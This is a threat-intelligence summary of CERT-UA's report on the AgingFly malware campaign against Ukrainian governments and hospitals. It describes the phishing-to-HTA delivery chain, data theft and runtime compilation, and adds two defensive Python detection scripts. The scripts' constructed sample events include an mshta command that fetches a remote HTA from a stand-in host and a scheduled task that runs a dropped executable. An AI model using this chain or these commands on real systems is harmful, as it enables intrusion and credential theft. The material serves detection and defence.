AgingFly Malware Used in Attacks on Ukraine's Government and Hospitals
Ukraine’s CERT-UA has identified a new malware family, AgingFly, used in attacks against local governments and hospitals to steal Chromium-based browser data and WhatsApp messages, with potential targeting of Defense Forces representatives. The campaign, attributed to cluster UAC-0247, begins with a phishing email offering humanitarian aid, leading to an LNK that launches an HTA to fetch and execute a staged payload and establish a TCP reverse shell to the C2. AgingFly is notable for compiling command handlers on the host at runtime from source code received from the C2, which enables on-demand capabilities but increases complexity and detection risk. It exfiltrates browser data via ChromElevator and WhatsApp data via ZAPiDESK, conducts reconnaissance and lateral movement, and communicates with its C2 over WebSockets with AES-CBC encryption; CERT-UA recommends blocking LNK, HTA, and JS files to disrupt the attack chain.

New AgingFly Malware Used in Attacks on Ukraine Govt, Hospitals
- Overview
  - A new malware family named AgingFly has been identified in cyber operations targeting local government bodies and hospitals in Ukraine.
  - The attacks focus on stealing authentication data from Chromium-based browsers and from the WhatsApp desktop application.
  - CERT-UA attributes these campaigns to a cyber threat cluster monitored as UAC-0247, with potential targets including representatives of the Defense Forces.
  - AgingFly is a C#-based malware that provides remote control, command execution, data exfiltration, screenshot capture, keylogging, and arbitrary code execution capabilities.
  - Communications with the command-and-control (C2) server occur over WebSockets, with traffic encrypted using AES-CBC and a static key.
  - A striking feature is that the malware retrieves command handlers from the C2 server as source code and compiles them on the host at runtime, rather than containing pre-built handlers.
- Attack Chain
  - Initial lure: The operation begins with an email posing as a humanitarian aid offer, urging the recipient to click an embedded link.
  - Redirect path: The link points to a compromised legitimate site (via a cross-site scripting vulnerability) or to a fake site generated with an AI tool.
  - Delivery mechanism: The target receives an archive containing a shortcut file (LNK) that launches a built-in HTA handler, which then connects to a remote resource to fetch and execute the HTA file.
  - Deception and execution: The HTA presents a decoy form to misdirect the user and creates a scheduled task that downloads and runs an EXE payload that injects shellcode into a legitimate process.
  - Loader stages: Attackers deploy a two-stage loader; the second stage uses a custom executable format, and the final payload is compressed and encrypted.
  - Staging and connection: A typical TCP reverse shell or a Ravenshell-like stager is used to establish an encrypted TCP connection to the management server for command execution via the Windows Command Prompt.
  - Final deployment: In a subsequent stage, AgingFly is delivered and deployed. A PowerShell script (named SILENTLOOP) executes commands, updates configuration, and retrieves the C2 address from a Telegram channel or other fallback mechanisms.
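The delivery chain above (LNK starts the built-in HTA handler, mshta.exe, which fetches a remote HTA; the HTA registers a scheduled task; the task runs a dropped EXE) leaves a recognisable parent/child trail in process-creation telemetry. The following detection logic is an added example, not code from CERT-UA or from the report. It assumes Sysmon-style process-creation events already parsed into the fields shown, and that the Task Scheduler service appears as an svchost.exe instance whose command line names the Schedule service; the sample events are constructed, not real telemetry.

```python
"""Process-lineage checks for the LNK -> HTA -> scheduled task -> EXE chain.

Added example, not code from CERT-UA or the report. Assumes Sysmon-style
process-creation events already parsed into the fields below; the sample
events at the bottom are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str                  # full path of the new process
    command_line: str
    parent_image: str
    parent_command_line: str = ""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Paths an unprivileged user can write to; a payload dropped by an HTA lands here.
USER_WRITABLE = re.compile(
    r"\\(appdata\\local\\temp|appdata\\roaming|downloads|public)\\", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)


def remote_hta(ev: ProcEvent) -> bool:
    """HTA handler started from a shell with a URL argument: the HTA is fetched remotely."""
    return (basename(ev.image) == "mshta.exe"
            and basename(ev.parent_image) in {"explorer.exe", "cmd.exe", "powershell.exe"}
            and REMOTE_URL.search(ev.command_line) is not None)


def hta_schedules_task(ev: ProcEvent) -> bool:
    """schtasks.exe creating a task while its parent is the HTA handler."""
    return (basename(ev.image) == "schtasks.exe"
            and basename(ev.parent_image) == "mshta.exe"
            and "/create" in ev.command_line.lower())


def task_runs_user_path_exe(ev: ProcEvent) -> bool:
    """Task Scheduler service (svchost.exe hosting Schedule) starts an EXE from a user-writable path."""
    return (basename(ev.parent_image) == "svchost.exe"
            and "schedule" in ev.parent_command_line.lower()
            and USER_WRITABLE.search(ev.image) is not None)


RULES = {
    "remote_hta": remote_hta,
    "hta_schedules_task": hta_schedules_task,
    "task_runs_user_path_exe": task_runs_user_path_exe,
}


def evaluate(events):
    """Return (event index, rule name) for every rule that fires, in event order."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


# Constructed sample: the three chain steps plus one benign schtasks query.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://aid-offer.example/form.hta",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "C:\Users\jsmith\AppData\Local\Temp\update.exe"',
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(r"C:\Users\jsmith\AppData\Local\Temp\update.exe",
              r"update.exe",
              r"C:\Windows\System32\svchost.exe",
              r"svchost.exe -k netsvcs -p -s Schedule"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r"schtasks.exe /query /tn Updater",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {SAMPLE_EVENTS[idx].command_line}")
```

Each rule fires on one link of the chain independently, so a single hit is a lead rather than a verdict; correlating all three within a short window on the same host is what makes the LNK/HTA/scheduled-task pattern stand out from legitimate mshta or schtasks use.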
- Data Theft and Reconnaissance
  - Browser data theft: The attackers use an open-source tool called ChromElevator to decrypt and extract cookies and saved passwords from Chromium-based browsers (Chrome, Edge, Brave) without requiring administrator privileges.
  - WhatsApp data access: For Windows, the malware attempts to decrypt WhatsApp databases using ZAPiDESK, an open-source forensic tool.
  - Lateral movement and reconnaissance: The actor conducts network reconnaissance and moves laterally, employing publicly available utilities such as RustScan for port scanning, Ligolo-ng for tunneling, and Chisel for remote port forwarding.
- Compiler-on-Host and Dynamic Command Handling
  - Core design: AgingFly is described as a modular malware that compiles command handlers on the host from source code received from the C2 server, rather than shipping with built-in handlers.
  - Dynamic capabilities: This runtime compilation enables on-demand extension of capabilities and potential evasion of static detections.
  - Trade-offs: While the approach allows a smaller initial payload and flexible functionality, it introduces added complexity, creates a reliance on continuous C2 connectivity, increases the runtime footprint, and can raise detection risk.
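The detection-risk side of this trade-off is concrete: compiling C# on a host that is not a developer workstation produces telemetry that ordinary software does not. The following triage logic is an added example, not code from CERT-UA or from AgingFly. The report does not say which .NET mechanism the malware uses, so two common ones are covered as assumptions: CodeDOM, which spawns csc.exe with a response file, and Roslyn, which loads Microsoft.CodeAnalysis*.dll into the calling process. The events are constructed Sysmon-style process-creation and image-load records; the build-tool allow list is a starting point to be tuned per environment.

```python
"""Telemetry checks for .NET compile-on-host behaviour.

Added example, not code from CERT-UA or from AgingFly. The report says the
handlers are compiled on the host but not by which mechanism, so two common
.NET paths are covered as assumptions: CodeDOM (spawns csc.exe with a
response file) and Roslyn (loads Microsoft.CodeAnalysis*.dll in-process).
The events below are constructed, Sysmon-style records.
"""
import re
from dataclasses import dataclass

# Processes that legitimately drive the C#/VB compilers on a developer box.
BUILD_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe", "vbcscompiler.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}
ROSLYN_DLL = re.compile(r"microsoft\.codeanalysis(\.csharp|\.visualbasic)?\.dll$", re.I)
TEMP_PATH = re.compile(r"\\appdata\\local\\temp\\", re.I)


@dataclass(frozen=True)
class ProcessCreate:
    image: str
    parent_image: str
    command_line: str


@dataclass(frozen=True)
class ImageLoad:
    image: str      # process that loaded the module
    loaded: str     # full path of the loaded module


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process_create(ev):
    """Reasons a compiler launch looks like on-host compilation by an implant."""
    reasons = []
    if basename(ev.image) not in COMPILERS:
        return reasons
    parent = basename(ev.parent_image)
    if parent not in BUILD_PARENTS:
        reasons.append(f"compiler spawned by non-build parent {parent}")
    if TEMP_PATH.search(ev.parent_image):
        reasons.append("parent runs from %TEMP%")
    if TEMP_PATH.search(ev.command_line):
        reasons.append("response file or output under %TEMP%")
    return reasons


def score_image_load(ev):
    """Reasons a Roslyn assembly load looks like in-process compilation by an implant."""
    reasons = []
    if not ROSLYN_DLL.search(ev.loaded):
        return reasons
    loader = basename(ev.image)
    if loader not in BUILD_PARENTS:
        reasons.append(f"Roslyn compiler assembly loaded by {loader}")
    if TEMP_PATH.search(ev.loaded):
        reasons.append("Roslyn assembly itself staged under %TEMP%")
    return reasons


def triage(events, threshold=2):
    """(event index, reasons) for each event with at least `threshold` reasons."""
    hits = []
    for i, ev in enumerate(events):
        reasons = (score_process_create(ev) if isinstance(ev, ProcessCreate)
                   else score_image_load(ev))
        if len(reasons) >= threshold:
            hits.append((i, reasons))
    return hits


# Constructed sample: one CodeDOM-style launch and one Roslyn load from an
# implant dropped in %TEMP%, alongside a normal MSBuild and Visual Studio session.
SAMPLE_EVENTS = [
    ProcessCreate(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
                  r"C:\Users\jsmith\AppData\Local\Temp\update.exe",
                  r'csc.exe /noconfig /fullpaths @"C:\Users\jsmith\AppData\Local\Temp\h4nd1er.cmdline"'),
    ProcessCreate(r"C:\Program Files\dotnet\sdk\8.0.100\Roslyn\bincore\csc.dll",
                  r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
                  r'csc.exe /noconfig @"C:\src\app\obj\Debug\app.csproj.cmdline"'),
    ImageLoad(r"C:\Users\jsmith\AppData\Local\Temp\update.exe",
              r"C:\Users\jsmith\AppData\Local\Temp\Microsoft.CodeAnalysis.CSharp.dll"),
    ImageLoad(r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
              r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\Roslyn\Microsoft.CodeAnalysis.dll"),
    ProcessCreate(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

The per-event reason count is deliberately simple: one anomaly (a compiler under %TEMP%, or a non-build parent) is a reason to look, two together are rarely benign. Because AgingFly compiles each handler on demand, a host should show this pattern repeatedly while the implant is tasked, which is a much stronger signal than a single compile event.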
- Technical Characteristics and Artifacts
  - Language and tooling: Implemented in C#, providing remote control, file exfiltration, screenshots, keylogging, and arbitrary code execution features.
  - Communication and security: C2 communication uses WebSockets with AES-CBC encryption and a static key.
  - Data exfiltration scope: Targeted data includes browser credentials and messages from the WhatsApp desktop application, among other potential data sources discovered during investigations.
  - Loader architecture: Two-stage loading with a customized, dynamically compiled final payload.
  - Staging indicators: Presence of a PowerShell component (SILENTLOOP) used to adjust configuration and obtain or refresh the C2 address.
- Attribution and Observations
  - Investigative stance: CERT-UA has documented the attack chain and noted the use of specific open-source tools and deceptive techniques to obfuscate the campaigns.
  - Targets: Local government entities and hospitals in Ukraine are confirmed victims, with possible expansion to defense-related personnel based on forensic evidence.
  - Behavioral patterns: The operation blends social engineering, legitimate site compromises, decoy interfaces, and multi-stage payload delivery to establish persistence and control.
- Related Context and Visual Aids
  - Attack chain visuals: Diagrams illustrate the progression from phishing and HTA-driven delivery to the final AgingFly deployment and C2 communications.
  - Tooling map: The operation makes use of browser data extraction tools (ChromElevator) and forensic utilities (ZAPiDESK), alongside common reconnaissance and tunneling utilities (RustScan, Ligolo-ng, Chisel).
- Notable Observations on Defensive Signatures
  - Prevalent file types in the chain: LNK, HTA, and JavaScript-based artifacts feature prominently in the delivery and execution steps of the campaign.
  - Command handler dynamics: The absence of embedded command handlers and reliance on on-demand source code from C2 distinguishes AgingFly from many conventional trojan families.
  - Potential indicators: WebSocket-based C2 traffic with AES-CBC encryption, dynamic runtime compilation events, and PowerShell-driven maintenance tasks present practical signals for detection and monitoring.